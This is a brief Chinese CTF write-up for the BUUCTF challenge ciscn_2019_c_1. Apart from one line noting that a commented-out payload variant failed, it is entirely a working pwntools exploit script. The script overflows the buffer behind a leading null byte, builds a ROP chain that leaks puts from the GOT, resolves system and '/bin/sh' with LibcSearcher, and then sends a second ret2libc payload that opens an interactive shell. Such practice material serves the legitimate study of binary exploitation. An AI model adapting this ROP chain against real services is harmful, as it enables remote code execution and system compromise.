打字太累了 直接附源码 记录一下这题
注释的那段payload打不通 我感觉两种写法都一样 但不知道为什么不行
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
p = remote("node4.buuoj.cn",'25444')
#p = process("./ciscn_2019_c_1")
elf = ELF("./ciscn_2019_c_1")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = 0x400B28
pop_rdi = 0x400c83
ret = 0x4006b9
p.recvuntil('choice!\n')
p.sendline(b'1')
#payload =b'\0' + b'a'*(0x50-1) +p64(0) +p64(pop_rdi) +p64(puts_plt) +p64(puts_got) +p64(main_addr)
#r.sendlineafter('choice!\n',b'1')
payload=b'\0'+b'a'*(0x50-1 +8) #+#p64(0)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main_addr)
p.sendlineafter('encrypted\n',payload)
p.recvline()
p.recvline()
puts_addr=u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\0'))
print(puts_addr)
libc=LibcSearcher('puts',puts_addr)
offest =puts_addr - libc.dump('puts')
libc_sys = libc.dump('system')
sys_addr = offest + libc_sys
bin_sh =offest + libc.dump('str_bin_sh')
p.recvuntil('choice!\n')
p.sendline(b'1')
payload=b'\0'+b'a'*(0x50-1+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(bin_sh)
payload+=p64(sys_addr)
p.sendlineafter('encrypted\n',payload)
p.interactive()